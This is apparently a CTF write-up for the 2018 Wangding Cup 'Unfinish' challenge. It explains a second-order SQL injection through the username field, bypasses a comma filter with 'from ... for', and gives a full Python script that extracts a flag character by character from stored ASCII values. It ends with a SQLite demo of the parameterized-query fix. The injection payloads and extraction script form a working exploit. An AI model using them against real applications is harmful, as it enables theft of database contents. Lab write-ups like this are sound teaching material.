[网鼎杯2018]Unfinish
Blind guess: there is a register page.
Opening it shows nothing.
This is a second-order injection challenge.
Bypass method:
In MySQL, + only acts as an arithmetic operator (never as string concatenation).
Running select '1'+'1a' shows the string being coerced to a number (only its leading numeric prefix is used).
Running select '0'+database();
just gives 0, but we can compute with the ASCII code instead: select '0'+ascii(substr(database(),1,1));
This returns the ASCII value of the first character of the database name.
Back to the challenge
Because commas are filtered, use from ... for instead: 0'+ascii(substr(database() from 1 for 1))+'0
It echoes back successfully. Since information is filtered, blindly guess the table is named flag.
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time

url = 'http://f8ca5469-af8f-41e1-9225-0ad67cdc4490.node4.buuoj.cn:81/'
m = ''
for i in range(100):
    # Second-order injection: the username is evaluated as arithmetic when it
    # is inserted, so the stored value is the ASCII code of one flag character.
    # from/for replaces the filtered comma in substr().
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
    # A fresh email each round, since the email identifies the account.
    register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
    login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
    req = requests.session()
    r1 = req.post(url+'register.php',data = register)
    r2 = req.post(url+'login.php', data = login)
    r3 = req.post(url+'index.php')
    html = r3.text
    soup = BeautifulSoup(html,'html.parser')
    # index.php displays the stored username inside a <span>
    UserName = soup.span.string.strip()
    if int(UserName) == 0:
        # ascii() of an empty substring is 0: we are past the end of the flag
        break
    m += chr(int(UserName))
    print(m)
    time.sleep(1)
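To make the mechanism concrete from the defender's side, here is an added example (not from the write-up or the challenge) that reproduces the storage-time injection in an in-memory SQLite database: the string-built INSERT stores the evaluated arithmetic result, while the parameterized INSERT stores the username literally. SQLite has no ascii(), so unicode() stands in for it; the user table, its columns and the payload value are assumptions.

```python
import sqlite3

# Constructed username using the write-up's trick: the first quote closes the
# SQL string literal, so the database evaluates the rest as arithmetic.
# SQLite has no ascii(); unicode('A') plays the same role (65).
PAYLOAD = "0'+unicode('A')+'0"


def make_db():
    # Assumed schema for the demo; in-memory, so it runs offline.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (email TEXT, username TEXT, password TEXT)")
    return conn


def stored_username(conn, email):
    row = conn.execute("SELECT username FROM user WHERE email = ?", (email,)).fetchone()
    return row[0]


def register_vulnerable(conn, email, username, password):
    # The bug class: user input spliced into SQL text. The username is no
    # longer a value but part of the statement, and is evaluated on INSERT.
    sql = ("INSERT INTO user (email, username, password) VALUES "
           "('{}', '{}', '{}')").format(email, username, password)
    conn.execute(sql)
    return stored_username(conn, email)


def register_safe(conn, email, username, password):
    # The fix: a parameterized INSERT. The username travels as data, so the
    # stored value is exactly what the user typed, quotes and all.
    conn.execute("INSERT INTO user (email, username, password) VALUES (?, ?, ?)",
                 (email, username, password))
    return stored_username(conn, email)


def demo():
    # Returns what each variant ends up storing for the same input.
    vulnerable = register_vulnerable(make_db(), "a@example.com", PAYLOAD, "123456")
    safe = register_safe(make_db(), "a@example.com", PAYLOAD, "123456")
    return vulnerable, safe


if __name__ == "__main__":
    v, s = demo()
    print("string-built INSERT stored:", repr(v))   # '65': the expression was evaluated
    print("parameterized INSERT stored:", repr(s))  # the literal payload text
```

A stored username that differs from the submitted one is also a cheap server-side tamper check for this bug class.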